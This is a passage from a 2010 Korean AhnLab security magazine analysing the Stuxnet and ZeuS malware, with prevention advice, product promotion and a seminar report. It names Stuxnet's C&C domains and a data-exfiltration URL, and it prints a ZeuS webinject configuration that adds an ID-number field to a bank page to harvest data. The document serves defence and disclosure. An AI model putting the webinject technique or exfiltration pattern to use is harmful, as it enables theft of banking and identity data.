SPECIAL REPORT 최악의악성코드심층분석및대응방안 2010. 10/ 11 03 악성코드의새로운패러다임 Stuxnet 스턱스넷 (Stuxnet) 스턱스넷 (Stuxnet) 은보안위협의패러다임을바꾸는차원이다른악성코드이다. 지금까지등장한악성코드가자기과시나금전적인이득을목적으로한것과달리스턱스넷은단지핵심시설의파괴만을목표로하고있다. 이로인해스턱스넷은악성코드가사이버무기화된첫번째사례로주목받고있는것이다. 또한현존하는악성코드가운데가장정교한것으로도평가받고있다. 스턱스넷 (Stuxnet) 은폐쇄망으로운용되는대규모산업시설을겨냥해제작된악성코드로서, 특정산업자동화시스템만을공격목표로제작된프로그램이다. 이악성코드는원자력, 전기, 철강, 반도체, 화학등주요산업기반시설의제어시스템에오작동을유발함으로써시스템마비및파괴등의치명적인손상을입힐수있다. 실제로이란부셰르원자력핵발전소와중국 1천여개주요산업시설을비롯해전세계여러국가에감염이확산된것으로알려지고있다. 스턱스넷공격동향 1. 이란의핵시설에스턱스넷공격 (2010 년 1월 ~ 9월 ) 부셰르원전핵발전소운영시스템과운영자 PC에스턱스넷침투나탄즈우라늄농축시설스턱스넷감염으로수차례오작동유발 2. 중국내주요산업기반시설에스턱스넷공격 (2010 년 7월 ~ ) 중국 600 만 PC 가스턱스넷에감염, 주요산업시설공격 (1 천여개 ) 중국의철강, 전력, 원자력등주요산업시설스턱스넷공격피해조사중 3. 미국, 인도네시아, 인도, 파키스탄에서도스턱스넷발견이악성코드는 C&C(Command & Control) 서버를통해 SCADA 시스템의 PLCs(programmable logic controllers) 를제어하기위한프로그램명령어를받아와서임의로변경함으로써악성코드제작자가원하는동작을수행하는것을가능하게한다. 이악성코드에영향을받는환경은다음과같다. 1. SCADA 시스템에지멘스 (Siemens) 의 WinCC/Step7 통합관리도구가설치되어있어야함 2. PLC 타입이 6ES7-315-2 또는 6ES7-417 인경우 3. Windows OS 기반의시스템이처럼스턱스넷의동작조건이한정적이기때문에일반사용자들의 PC가감염되더라도크게위협이되지는않는다. 그러나관련업계에종사하는사용자가악성코드에감염된 PC에서감염된 USB 를 SCADA 시스템을운영하는시스템과동일한네트워크의 PC에삽입하는경우에감염될수있으므로주의가필요하다. 스턱스넷감염프로세스안철수연구소시큐리티대응센터의분석에따르면 ' 스턱스넷 ' 은여러개의파일로구성되며, 알려지지않은여러개의취약점을이용해서산업자동화제어시스템을제어하는 PC에드롭퍼 (Dropper, 스턱스넷의핵심모듈파일을생성하는하는파일 ) 가실행된다. 이드롭퍼는정상 s7otbxdx.dll 파일의이름을변경해백업하고정상 s7otbxdx.dll 파일과동일한이름으로자신의파일을생성한다. 이후산업자동화제어시스템을통합관리하는도구인 Step7 을실행하면원래의정상파일이아닌스턱스넷이실행된다. 'Step7' 의기능은 s7otbxdx.dll 파일을통해서제어 PC와산업자동화제어시스템간에블록파일을교환하는것이다. 이파일을스턱스넷의 DLL 파일로바꾸면산업자동화제어시스템을모니터링하거나제어 ( 수정또는악성블록생성 ) 할수있다. 이후공격자는모터, 컨베이어벨트, 펌프등의장비를제어하거나심지어폭발시킬수도있다. 즉, 산업시설이관리자가아닌악의적공격자에게장악될수있는것이다. 스턱스넷의공격과정은 [ 그림 1] 을통해자세히살펴보자. 17

5 공격명령생성 Attacker www.mypremierfutbol.com www.todaysfutbol.com C&C 서버 2 감염시스템정보전송 6 공격명령전송 www.mypremierfulbol.com/ index.php?data=66a54e2 7 관리자의 PLC 제어명령생성 8 PLC 제어명령변조 9 Target 공격 10 산업장비감염설비제어장애발생 1 USB 를통한감염 개인 PC 스턱스넷에감염된 PC WinCC/STEP7 PLC 제어 PC 3 내부네트워크감염 Zero Day Attack 공유폴더, 오토런 MS08-064, 046, 061 4 공격명령 Share RPC 서버통신 내부시스템 [ 그림 1] 스턱스넷악성코드감염개념도 1. 스턱스넷에감염된 PC에서 USB 를통해 PLC 를제어하는메인 PC에스턱스넷전파스턱스넷은메인악성코드설치를위해 ~WTR4141.tmp 파일과 ~WTR4132.tmp 2개의파일을사용하고최초악성코드실행을위해 Autorun.inf 와 MS10-046 취약점을공격하는.lnk 파일을이용한다. 2. 감염된 PC에서 C&C 서버로감염시스템정보전송 IExplorer.exe 프로세스에인젝션 (Injection) 되어 C&C 서버와통신감염 PC의 OS버전, 감염시간, IP정보, 감염된 Project 파일등정보를 C&C 서버에전송 C&C 서버의명령에따라감염된다른시스템들의버전업데이트를위한 RPC 서버로동작 3. 악성코드유포를위해내부네트워크의타시스템공격 WINCC database 를이용한감염, 네트워크공유를이용한감염, MS 10-061 프린터스풀러보안취약점을이용한감염, MS 08-067 및 MS10-046 취약점을이용한감염등의방법으로네트워크내의다른시스템을감염시킨다. 4. 감염된메인 PC와추가감염된내부시스템간의공격명령공유악성코드감염시 RPC 서버가동작하여네트워크상의다른감염된클라이언트로부터감염된버전체크를위한통신을수행하고버전이낮은경우상위버전의악성코드를받아설치한다. 5. 악성코드제작자의공격명령생성악성코드제작자는임의의공격명령의생성해 C&C 서버에전송한다. 6. 공력명령전송 C&C 서버는악성코드제작자가제작한암호화된바이너리코드를받아와실행한다. 7. 관리자의 PLC 제어명령생성 PLC 장치를제어하기위한 Step7 프로그램은 STL 이나 SCL 과같은언어로제작된데이터와코드의 Block 들을 MC7 형태의파일로컴파일해서 PLC 장치에전송해주고 PLC 장치는이 Block 들을받아메모리에저장한후로드하여동작한다. s7otbxdx.dll 파일은 PLC 장비와관리프로그램간의데이터교환을해주는기능을가진파일이다. 스턱스넷악성코드에감염된경우악성코드는원래프로그램에서동작하고있는정상 dll 파일을 s7otbxsx.dll 파일로이름을변경한후악성코드제작자가임으로제작한악의적인 dll 파일을동일한파일명으로생성한다. dll 파일이변경됨으로인해다음과같은행위가가능하게된다. 1) Step7 프로그램과 PLC 장비간에교환되는 PLC Block 들에대한모니터링을할수있다. 2) 관리자가생성한데이터 Block 들에공격자가의도하는명령어가들어있는 Block 을삽입하거나 Block 을교체함으로써 PLC 장치가공격자의의도대로동작하게한다. 3) 감염된 PLC 장치의정보를확인할수있다. 9. 타깃 (Target) 공격이렇게변조된명령어를통해악성코드제작자가의도한타깃에대한공격을시도한다. 10. 산업장비감염 - 설비제어장애발생악성코드제작자는자신의의도에따라모터, 컨베이어벨트, 펌등의장비를제어하거나마비등의장애를일으킬수있다. RPC Client 1 악성코드버전체크 2 감염버전정보전송 RPC Server 3 로컬 PC의버전비교 4 상위버전악성코드요청 5 악성코드전송 6 최신악성코드설치 [ 그림 2] RPC 서버를이용한최신버전의악성코드공유프로세스 STEP7 PLC 장치 8. PLC 제어명령변조 CodeBlock AddBlock Code Block 요청 스턱스넷악성코드가의도하는것은 PLC 장치에공격자가의도한명령어 를삽입하는것이다. 이를위해공격자는특정버전의 Step7 프로그램에 서사용하는 s7otbxdx.dll 파일을공격자가임의로제작한것으로교체한다. 변경된 DLL 변조된 Code Block S7otbxdx.dll 원본 DLL S7otbxsx.dll Code Block 전송 [ 그림 3] 악성 s7otbxdx.dll 을이용한 PLC 의 Code Block 변조 Code Block 18

스턱스넷감염예방을위한일반적인조치사항스턱스넷은기존악성코드와는다른패턴을보여주고있다. 하지만감염과유포방식에있어서는 USB 라는이동형저장장치와윈도우 OS의취약점을이용하고있다. 이부분에초점을맞춰기업보안담당자가취할수있는예방방법은다음과같다. 스턱스넷 컨피거웜 신종악성코드 USB 실행 IP/Port 실행 허가되지않은프로그램실행 1. 최신버전으로업데이트된백신소프트웨어사용 스턱스넷악성코드의확산도가 7 월이후전세계적으로점점증 가하고있는추세이고변형또한많이발견되고있는상황이므로 최신버전의백신프로그램을사용해서감염을예방해야한다. 2. USB 자동실행방지 대부분의 SCADA 시스템은폐쇄망에서운영되므로실제감염 이발생하는경로로이용될수있는것은 USB 일가능성이높다. 따라서폐쇄망에서사용되는시스템의경우 V3 의 CD/USB 자동 실행방지옵션을활성화하여감염을예방한다. 3. 최신보안패치적용 사내시스템이윈도우 OS 의취약점을이용한공격에의해감염 되는것을예방하기위해최신보안패치를업데이트하는것이 중요하다 1) Microsoft 보안공지 MS10-046 - 긴급 Windows 쉘의취약점으로인한원격코드실행문제점 (2286198) http://www.microsoft.com/korea/technet/security/bulletin/ms10-046.mspx 2) Microsoft 보안공지 MS10-061 - 긴급 인쇄스풀러서비스의취약점으로인한원격코드실행문제점 (2347290) http://www.microsoft.com/korea/technet/security/bulletin/ms10-061.mspx 3) Microsoft 보안공지 MS08-067 - 긴급 서버서비스의취약점으로인한원격코드실행문제점 (958644) http://www.microsoft.com/korea/technet/security/bulletin/ms08-067.mspx 4) Privilege escalation via Keyboard layout file 패치미제공 5) Privilege escalation via Task Scheduler - 패치미제공 4. 공유폴더사용주의 불필요한공유폴더생성은금지하고생성한공유폴더에는접 근이필요한사용자계정에게만읽기권한주도록하되함부로 쓰기권한은주지않도록한다. 스턱스넷감염예방을위한제언산업용시스템전용보안솔루션 AhnLab TrusLine 앞서언급했듯이스턱스넷은기존의악성코드와는완전히다른 목적성을띠고있다. 일반적인악성코드가유포나확산을목적으 로하는반면, 스턱스넷은정확한타깃을노려제작되었다. 따라 서악성코드샘플수가적기때문에수집자체에어려움을겪을 수밖에없다. 또한샘플이수집되었더라도특정시스템에서만 동작하므로악성코드여부를확인할수있는테스트실시도쉽지 않은일이다. 스턱스넷뿐만아니라최근발생하고있는악성코드 [ 그림 4] AhnLab TrusLine 개요 들은날로새로운기법으로무장하고있어전통적인블랙리스트 기반의안티바이러스솔루션으로방어하기엔역부족인상황이다. 특히, 악성코드침해로인해운영상의장애가발생할경우엄청 난피해로이어지는산업용시스템의경우에는안정성확보를위 한새로운컨셉의보안솔루션도입이반드시필요하다. 안철수 연구소가지난 9 월출시한 AhnLab TrusLine( 안랩트러스라인, 이 하트러스라인 ) 은산업용시스템환경에적합한최적의보안솔 루션이다. 트러스라인은허용된프로그램만실행가능하게하는 화이트리스트기반의보안솔루션으로, 불필요한프로그램작동 이나악성코드침입등으로시스템의작동에차질이생기지않도 록해주는제품이다. 트러스라인의특징은다음과같다. 처리방식 프로그램제어 편의성 엔진사이즈 리소스점유율 보안수준 업데이트 / 패치 [ 그림 5] White List vs Black List 비교 AhnLab TrusLine White List 기반의 TrusLine 사전예방 허용된 Application 만사용 제한적환경 변경없음 낮음 높음 업데이트가필요한경우정기적인라인점검시스케쥴링가능 화이트리스트 (White List) 기반의보안솔루션 트러스라인에적용한화이트리스트방식은현존악성코드는물 론미발견변종 / 신종악성코드까지막을수있다. 기존백신제 품은엔진에포함된악성코드시그니처를기반으로악성코드유 무를판단하기때문에사후처리만가능하다. 반면, 트러스라인 은허용된프로그램만실행하게함으로써현존악성코드뿐아니 라향후발생할변종및신종악성코드까지원천적으로막을수 있다. 즉, 애플리케이션제어, 비허가실행코드차단, USB 등매 체제어, IP/Port 차단등과같은기능을갖추고있기때문에스턱 스넷과같은악성코드가실행조차되지않는환경을만들어주는 것이다. 트러스라인은기존일반적인화이트리스트방식의제품 과도다른차별점을지니고있다. 즉, 다른제품은각클라이언트 PC 에설치된파일의안전여부를 PC 용백신으로검증하는데반 해트러스라인은관리서버에서검증한다. 따라서클라이언트 PC 용백신을추가로설치하지않아도된다. Black List 기반의 Anti-Virus 사후처리 모든 Application 사용가능 범용적환경 지속적인증가 높음 낮음 실시간업데이트 / 패치적용으로장애발생우려 19

실행파일 IP/Port 차단 Lock Engine 정책설정 관리 Console 지정된프로그램만설치및사용 실행파일 IP/Port 차단 Lock Engine [ 그림 6] AhnLab TrusLine 구성도 Signature Update 악성코드분석 악성코드의감염및신종악성코드에대한예방 Internet USB 자동실행방지 트러스라인이적용되어 Locking 된시스템은화이트리스트를기반 으로운용되기때문에이리스트에존재할수없는악성코드의실 행이차단된다. USB 메모리를통한오토런 (autorun) 의실행과감염, 포트를통하여전파되는웜등의실행자체가불가능해지며, 신종 악성코드도리스트에등록될수없기때문에감염이될수없다. 악성코드침입루트를차단하기위한 IP & Port 차단기능트러스라인은실행프로그램의제어만으로는해결하기힘든악성코드의침입에대비하기위해산업용시스템에설치된프로그램이사용하는 IP와 Port 만오픈함으로써보다완벽한보안환경을구축할수있다. 특히기존에백신프로그램과함께설치되었던 Personal Firewall 이범용적환경지원을위해다양한기능을추가함으로써발생했던리소스점유율을최소화함으로써저사양의산업용프로그램에서도안정적으로사용할수있는기능을제공하고있다. 시스템관리정책의자연스러운적용사용자들에게 USB 메모리나공유폴더사용을금지해도 100% 막을수없다. 하지만트러스라인은불필요한프로그램실행을차단하므로위험의수준을낮추고관리의편의성을자연스럽게확보할수있다. 스턱스넷과같은악성코드의최종목표는타깃대상인산업용시스템에치명적인타격을입히는것이다. 이는악성코드가전략적으로이용될가능성이있음을보여주는구체적인사례이며, 앞으로도이같은공격은더욱늘어날것으로예상된다. 이에대응하기위해서는트러스라인과같은화이트리스트기반의전용솔루션으로대비하는방안이필요하다. 20

SPECIAL REPORT 최악의악성코드심층분석및대응방안 2010. 10/ 11 04 전세계인터넷뱅킹의공포 ZeuS 최근사용자의온라인뱅킹계정정보를탈취하는제우스 (ZeuS) 가맹위를떨치고있다. 하루평균 300 개이상의샘플이발 견되는것으로알려진제우스와그에의해생성되는제우스봇 (ZeuS Bot, 또는 ZBot) 의전세계적인피해사례를살펴본다. 아울러제우스의주요기능과감염경로를추적하고대응책에대해서도알아본다. 제우스 (ZeuS) 는 2007 년러시아에서처음개발된것으로추정되는대표적인봇넷 (BotNet) 생성킷 (Kit) 으로, 제우스킷에의해생성된봇을 ZeuS Bot, 또는 ZBot 이라고부른다. 특히 2009 년하반기부터북미지역등에서금융거래증명서를훔치거나자동결제시스템, 급여시스템의비인증온라인거래를하는등의범죄의주범으로제우스봇이대두되면서전세계적으로가장유명한범죄소프트웨어가되었다. 다양한브라우저가타깃, 모바일환경까지위협제우스는인터넷익스플로러 (Internet Explorer) 뿐만아니라파이어폭스 (Firefox) 도대상으로하고있다. 이를통해피해자의 PC를원격으로제어하여자금송금을지시하거나계좌정보를절취하고 HTML 인젝션 (Injection) 공격과트랜잭션위 / 변조공격에도이용하고있다. 또한최근에는모바일환경으로까지그범죄영역을넓혀가는상황이다. 특히다양한보안솔루션이적용된국내인터넷뱅킹환경과는달리, SSL 기반의인터넷표준을사용하는해외인터넷뱅킹의보안기능으로는제우스방어가불가능하기때문에해외피해사례는앞으로도꾸준히증가할것으로예상된다. 제우스킷의현재최신버전은 1.3.4.x 버전이며, 언더그라운드에서약 3,000 ~ 4,000 달러에거래가되는것으로알려져있다. 또한추가비용을지불하면다양한확장기능을보유한모듈을추가로제공한다. 제우스제작자는제우스킷을개발, 판매하여수익을얻고, 제우스킷의구매자는이를이용해제우스봇을생성, 배포하여감염된좀비 PC를제어할수있는봇넷 (Bot Net) 을구성한다. 이렇게구성된봇넷을통해다양한개인정보등을수집하여판매하거나봇넷자체를판매함으로써사이버범죄의생태계를형성하게된다. [ 그림 1] 신종플루 (H1N1) 백신에대한내용을포함하는제우스봇스팸메일 ( 출처 : 인터넷진흥원 ) 다양한브라우저가타깃, 모바일환경까지위협 스팸메일을통한전파 제우스봇의전파경로는일반적인악성코드의전파경로와유사 하며, 그중가장많은부분을차지하는것이스팸메일이다. 스 팸메일을통해사용자를피싱사이트로유도하거나스팸메일에 첨부된파일을통해전파를시도한다. 소셜네트워크를통한전파 최근들어 SNS 가급속히발전하면서제우스의전파경로도트위 터나페이스북과같은소셜네트워크 (Social Network) 환경으로옮 겨가고있는추세다. 트위터나페이스북에중요한정보사이트로 위장한피싱사이트의링크를올려사용자의방문을유도한다. 악성스크립트를통한전파 상대적으로보안이취약한사이트를해킹하여악성스크립트를 삽입하는경우다. 악성스크립트나 PDF 취약점등을이용해사 용자가수동으로파일을다운로드받지않더라도자동으로 PC 에 악성코드가다운로드되어실행하도록한다. 악의적인 PDF 파일 을 iframe 으로삽입하거나악성스크립트를삽입하게되면사용자 21

가해당사이트를방문했을때특정 URL 로접근하여사용자가모르는사이에제우스봇이다운로드되어실행된다. 제우스의주요피해사례 2007 년미교통국의정보탈취에이용되기도했던제우스는미국과유럽등지에서수많은유포사례및금융피해사례가존재하며, 조직적인금융해커들이체포되는등큰피해규모나조직적인범죄로유명하다. 2009 년 6월, BOA, NASA, Monster, ABC, Oracle, Cisco, Amazon, BusinessWeek 등웹사이트의약 7만개 FTP 계정을이용하여유포되기도했으며, 같은해 10월에는페이스북에 150 만개의피싱메시지를전송해유포하기도했다. 2010 년 2월, 미국의한프로모션회사는제우스감염으로인한온라인뱅킹사기로 16만 4천달러 ( 약 1억 9천만원 ) 의피해를입고파산위기에놓이기도했다. 또한영국의한은행에서는 7월하순경제우스에감염된수십만개의 PC 등에서약 3,000 개의고객계좌를무단전송해약 90만달러에달하는고객예금이빠져나간것이발견되기도했다. 동유럽에있는서버에서이를조종한것으로조사되었다. 9월 30일에는제우스를이용해미국의중소기업이나지방자치단체은행계정에접근하여수백만달러를훔친국제금융해커 60 여명이기소되기도했다. 또한 10월에는미국에서우리돈으로약 2,450 억원에달하는천문학적인금액을훔치려한여성해커가경찰에붙잡혔다. 영국타블로이드신문 ' 더선 ' 의 ' 세상에서가장섹시한해커 (World's sexiest hacker)' 라는제목의기사를통해체포사실이알려진이여성해커는유럽네티즌들에게무작위로이메일을보낸뒤클릭한이용자의 PC에제우스를침투시켜금융계좌비밀번호를획득했고, 위조여권을이용한가짜계좌에돈을넣어두었다고밝혔다. 경찰은이여성해커의단독범죄가아닌, 범죄집단의돈세탁을위한운반책으로고용됐다고밝혀제우스를이용한금융사기가범죄집단을통해조직적으로행해진다는것을확인할수있었다. 제우스의구성및주요기능제우스빌더 (ZeuS Builder) 제우스빌더는제우스봇을생성하는툴이다. 제우스빌더에서생성되는제우스봇은매번다른형태의바이너리를가지는새로운악성코드가된다. 제우스빌더에서생성되는제우스봇파일과기능은 [ 표 1] 과같다. 파일명 주요기능 sdra64.exe 제우스봇의실행파일 local.ds 외부로유출할탈취된정보를저장하는파일 user.ds 계정정보탈취대상웹사이트목록의설정파일 [ 표 1] 제우스빌더에서생성되는제우스봇파일 [ 그림 3] 제우스빌더 제우스어드민 (ZeuS Admin) 제우스어드민은제우스 C&C(Command and Control) 서버의관리페이지이다. 웹으로지원하며제우스봇에감염된좀비 PC를관리하고수집된정보들을포함한봇넷의상황을한눈에모니터링할수있다. 또한계정별로권한관리가가능하다. [ 그림 4] 제우스어드민 제우스봇의기능 제우스빌더로생성된 ZBot, 즉제우스봇은다음과같은역할을 수행한다. [ 그림 2] 영국타블로이드신문 ' 더선 ' 에보도된여성해커 시스템정보수집기능 제우스에감염된좀비 PC 로부터 PC 의시스템정보를수집한다. 제우스봇이수집하여 C&C 서버로전송하는정보는다음과같다. 22

ZeuS Bot 정보 ( 봇넷이름, Bot ID, Bot Version 등 ) 운영체제버전및언어 지역및시간 IP 주소 실행중인프로세스이름 거래정보 / 개인정보수집기능 제우스봇에감염된좀비 PC 를통해사용자가 user.ds 파일에 저장된 URL 에접속할경우, 사용자의모든입력값들을저장하 여 C&C 서버로전달하는기능이다. 제우스봇의핵심기능으로, 이기능으로때문에해외인터넷뱅킹에서제우스로인한피해 가이슈가되고있다. 제우스봇에서입력값들을가로채는기 능은크게 2 가지다. 1. 주요 API 후킹 웹브라우저를통해서버로전달되는입력정보를가로챈다. 특히 표준 SSL 을채택하고있는해외인터넷뱅킹환경에서는윈도우 에서제공하는 HttpSendRequest 와같은 HTTP 관련함수를후킹 할경우에는입력정보가암호화되기전에노출될수밖에없다. 2. 화면캡쳐 가상키보드를사용할경우에입력정보를가로채기위한기능이다. 마우스왼쪽버튼클릭시마우스포인터를기준으로일부크기의 영역을화면캡쳐함으로써가상키보드의입력값을가로챌수있다. 웹인젝션 (Web Injection) 기능 대부분의온라인뱅킹등웹사이트들은키로깅 (keylogging) 공격 이나네트워크 - 스니핑 (network-sniffing) 공격을회피하기위해보 안성을강화하고있다. 그러다보니이제사용자의정보를탈취 하는공격은 HTML 인젝션기술을이용하여이를우회하고있다. HTML 인젝션공격은실제정보가네트워크로전송되기전에사 용자가보게되는웹화면을변조하는것으로, 일반적인키보드 보안이나네트워크보안등의기법으로는대응하기어렵다. 제우 스는이러한 HTML 인젝션공격을쉽게할수있으며, 구성파일에 몇줄을추가하여간단히공격할수있다. 예를들어아래와같이 원래 ' 성명 ' 과 ' 전화번호 ' 만입력하는웹페이지를제우스를통해 변조하여그사이에 ' 주민번호 ' 를입력하도록변경할수있다. 변 set_url http://www.oooo.com/event.htm GP data_before name=' 성명 '</tr> data_end data_inject <tr><td> 주민번호 :</td><td><input type="text" name="p_number" id="p_ number"/></td></tr> dataend data_after data_end [ 그림 5] 제우스의 HTML 인젝션공격코드예시 조된사실을모르는사용자가 ' 주민번호 ' 를입력하게되면이정보는 C&C 서버로전송된다. 부가기능지금까지언급된기능외에 C&C 서버를통해추가적으로다음과같은여러가지명령을수행하도록할수있다. 컴퓨터리부팅및셧다운명령시스템파일삭제명령특정 URL 접속에대한차단 / 허용특정파일의다운로드및실행 PC 내의특정파일실행 (UI 를안보이게실행가능 ) PC 내의파일 / 폴더검색및전송디지털인증서탈취보호된저장영역과쿠키를통한정보탈취제우스의 Configuration file 업데이트제우스봇실행파일의파일명변경인터넷익스플로러의시작페이지변경등제우스확장모듈의주요기능제우스에서추가로제공하는확장모듈은별도로구매를해야하며, 각모듈별주요기능은 [ 표 2] 와같다. 모듈주요기능추가금액 ($) Back connect Firefox form grabber Jabber(IM) chat notifier 좀비 PC를직접접속하여인터넷뱅킹거래를수행할수있는기 1,500 능을제공함좀비 PC를직접접속하여인터넷뱅킹거래를수행할수있는기 2,000 능을제공함사용자가인터넷뱅킹사이트에로그인할때실시간으로정보를가 500 로채서알려주는기능을제공함 VNC Private module VNC 프로토콜을이용해좀비 PC를제어하는기능을지원함 10,000 Windows 7/Vista Support 제우스의기본버전은 XP만으로제한되지만이모듈을추가할경 2,000 우 Windows 7/Vista 를지원함 [ 표 2] 제우스확장모듈별주요기능 글로벌유명보안업체들, 대응책없어고심중제우스는해커의의도대로가공및변형, 생산이간편한패키지로구성되어있으며, 온라인을통해비교적쉽게구할수있다. 심지어제우스패키지의빌더에서버튼하나를클릭할때마다변형된제우스봇이생성되기도한다. 이러한이유로제우스봇은매우유행하고있으며, 기하급수적으로늘어나는변종에글로벌유명안티바이러스업체들도마땅한대응책은없는상황이다. 글로벌안티바이러스업체들은꾸준히수집되고있는제우스봇의변종들을분석하여엔진업데이트를하고있다. 또한이들의 C&C 서버를추적하여해당서버로의접속을차단하는등발빠르게움직이고있으나한외국의사이트의통계에따르면 40.2% 정도만검출해내는실정이다 (http://zeustracker.abuse.ch 참고 ). 따라서제우스봇대응은이러한안티바이러스업체들의검출과삭제 / 치료에의한대응보다는금융거래전문보안업체들을중심으로사용자정보의거래트랜잭션을보호하여제우스의행위로부터입력 / 전송되는정보들을보호하는방안이검토되고있다. [ 그림 6] 제우스에의해변조된웹페이지예시 23

안철수연구소, AOS 로씨티은행인터넷뱅킹보안강화 글로벌통합보안기업안철수연구소 ( 대표김홍선 www.ahnlab.com) 는최근한국씨티은행 ( 은행장하영구, www. citibank.co.kr) 의차세대온라인뱅킹시스템에자사의온라인통합보안서비스인 ' 안랩온라인시큐리티 (AhnLab Online Security, 이하 AOS)' 를공급및구축을완료했다. 이번씨티은행의시큐어브라우저환경구축및 AOS 전제품의도입은증권사에이어은행권최초로이루어진것으로, 단일보안서비스로모든형태의인터넷뱅킹보안위협에선제적으로대응하는시스템을구축한첫사례라는데서의미가크다. 한국씨티은행은최근인터넷뱅킹서비스가활성화되고이를노리는보안위협이증가함에따라인터넷뱅킹보안을강화하기위한시스템고도화를위해꾸준히노력해왔다. 그일환으로메모리해킹, 웹페이지변조등각종해킹시도를차단하는보안전용브라우저인 'AOS 시큐어브라우저 (Secure Browser)' 와키보드보안프로그램인 'AOS 안티키로거 (Anti-keylogger)', 백신프로그램인 'AOS 안티- 바이러스 / 스파이웨어 (Anti-virus/spyware)' 를도입했다. 또한이번프로젝트에서는기존에사용하고있던강력한방화벽프로그램인 'AOS 파이어월 (Firewall)' 의통합작업도함께이루어졌다. 이번 AOS 의도입으로씨티은행의인터넷뱅킹사용자는더욱안전한환경을보장받고, 은행은인터넷거래의신뢰성을높이게되었다. 특히 AOS 시큐어브라우저는할당된메모리영역에대한외부모듈로부터의접근을방지하고악성코드의디버깅과메모리접근을방지및보호 (protection) 하는별도의보안전용브라우저로, 최근해외에서화제가되었던제우스 (ZeuS) 및기타변종에의한공격, 해킹시도를원천적으로차단해한단계높은차원의사용자보안을제공할예정이다. 김홍선대표는 ' 인터넷뱅킹이점점활발해지고있는가운데, 악성해커들의개인정보탈취시도도더욱증가할것으로예상된다. 안철수연구소의 AOS 는특허받은기술력을바탕으로, 기존의 AV 제품과차별화된인터넷뱅킹전용보안을제공해점점고도화, 지능화되고있는인터넷뱅킹보안위협에근본적으로대응할수있다 ' 고전했다. 한편, AOS 는 'AOS 시큐어브라우저 ', 'AOS 안티키로거 ', 'AOS 파이어월 ', 'AOS 안티- 바이러스 / 스파이웨어 ' 로구성되어있으며, 다양한보안기능이통합된전방위온라인금융거래보안솔루션이다. 키보드, PC, 웹브라우저및메모리등악성코드침투와해킹이가능한모든통로를봉쇄함으로써사용자의정보침해를원천적으로막아준다. 사용자가다양한보안기능을단한번의설치로이용할수있다는것이장점이다. 안랩온라인시큐리티 (AhnLab Online Security), 전방위온라인금융거래보안지원 안철수연구소는제우스에대해안티바이러스제품인 V3 를통 해신속하게대응하고있지만, 수집되지않은제우스의샘플이 나새로운변종에대응하기위해트랜잭션보안전문솔루션인 AhnLab Online Security( 이하 AOS) 의기술을이용하고있다. AOS 는전용보안브라우저인 AOS 시큐어브라우저 (Secure Browser) 와키보드보안을위한 AOS 안티 - 키로거 (Anti-keylogger), 해킹툴 차단및네트워크침입차단을위한 AOS 파이어월 (Firewall) 등다 양한보안기능이통합된전방위온라인금융거래보안솔루션 이다. 이를통해 AOS 는제우스의해킹행위자체를차단하거나 사용자의입력정보를보호하여제우스로인한사용자의정보침 해를원천적으로막아준다. AOS 는먼저 AOS 파이어월을통해이 미진단이가능한제우스봇의실행을차단한다. 또한 AOS 시큐 어브라우저와 AOS 안티 - 키로거를통해웹페이지의로그인정 보탈취방어, HTML 인젝션및스크린캡쳐 (Screen Capture) 를 방어한다. 한편, 제우스의피해를최소화하기위해다음과같은사전예방이요구된다. 스팸메일주의현재까지발견된제우스봇은영어로작성된스팸메일을기반으로배포되고있기때문에출처가불분명한영어메일의링크를클릭하여방문하거나첨부파일을실행해서는안된다. 보안업데이트 MS 및 Adobe 의보안업데이트를항상최신버전으로적용해야한다. 또한백신프로그램의엔진을최신업데이트로유지해야하며실시간감시기능을활성화해야한다. 보안제품적용안랩사이트가드 (AhnLab SiteGuard) 를설치하면웹을통한악성코드유입을사전에차단할수있다. 이외에도온라인을통한개인정보입력시이용자들의신중한태도가필요하며, 평소철저한비밀번호관리등을통해제우스로인한피해를사전에방지하거나최소화하기위한노력이중요하다. 24

세미나지상중계 보안관제고객세미나 2010.10/11 빠르게변화하는위협양상보안관리자는괴롭다? 안철수연구소, 최신보안위협에대한기업보안관리의해법제시고객사관계자 100 여명참석해안랩보안관제서비스에뜨거운관심보여 안철수연구소는지난 10 월 6 일그랜드인터콘티넨탈호텔카네이션룸에서보안관제고객초청신규서비스설명회를열었다. 이날행사는국내최초로정보 보안서비스를선보인선두기업으로서안철수연구소가노하우와 20 년간축적된기술을고객들과공유하는시간으로진행됐다. 급변하는 IT 패러다임과그 에따른위협양상을하나라도놓치지않으려는참관객들이보여준높은집중도로열기가뜨거웠던현장을지금부터들여다본다. 이례적으로고객들의관심과요청으로개최된이번안철수연구소보안관제고객초청신규서비스설명회는기조연설을포함해총 5개의발표세션과실제고객사례발표로진행됐다. 보안관제고객사관계자약 100 여명이참석한가운데안철수연구소김홍선대표가기조연설을통해이날설명회의시작을알렸다. 급변하는 IT 패러다임과보안이슈 김홍선대표는아이폰과아이패드등애플사가주도하고있는 IT 기기트렌드를비롯해다양한소셜네트워크, 클라우드컴퓨팅등최근 IT 패러다임의변화와이에따른보안이슈를언급했다. 특히최근제우스 (Zeus) 로대표되는해킹의브랜드화및상품화를설명하고 " 악성코드트렌드의변화에따른입체적인대책마련이중요하다 " 고강조했다. 또한김홍선대표는 " 공격의양상이네트워크를비롯해엔드포인트, 웹, 트랜잭션에이르기까지입체적으로이루어지고있다 " 며, 이에대한대책으로엔드포인트및네트워크기반제품의악성코드제거는물론보안관제, 컨설팅등보안서비스를통한안철수연구소의입체적인대응프로세스를제시했다. 두번째발표자로나선보안관제팀윤삼수팀장은우선제로데이취약점과타겟공격부터최근이란원전을감염시킨 ' 스턱스넷 (Stuxnet)' 까지올한해의 10가지주요보안이슈들과위협전개양상을설명했다. 아울러이러한위협에대한방어가어려운이유로인터넷개방성및표준화, 인터넷시스템의복잡성증가, 악성코드와해킹기술의발달및인터넷을통한악성코드, 해킹툴의유포등을들었다. 윤삼수팀장은 " 이러한위협에대해수집, 분석, 대응에이어사후조치까지종합적인위협대응프로세스가필요하다 " 며 " 솔루션에서그치는것이아니라서비스와보 안인프라강화에이르는입체적인대응이필요하게되었다 " 고강조했다. 안랩보안관제서비스의새이름, AhnLab Sefinity 사업기획팀의신호철팀장은 ' 안랩보안관제현황및서비스로드맵 ' 에관해발표하고 AhnLab Sefinity 서비스에대해설명했다. 신호철팀장은특히 " 안철수연구소의보안관제서비스의새이름인 Sefinity 는 Security beyond Infinity, 즉보안, 그이상의보안이라는보안관제서비스의의미 " 라고설명하고 "3P 전략을통한안철수연구소만의차별화된보안관제서비스제공하고있다 " 고말했다. 3P 전략이란 Preventive( 사전예방활동 ), Proactive( 능동적인보안활동 ), Personalized( 개별화된서비스 ) 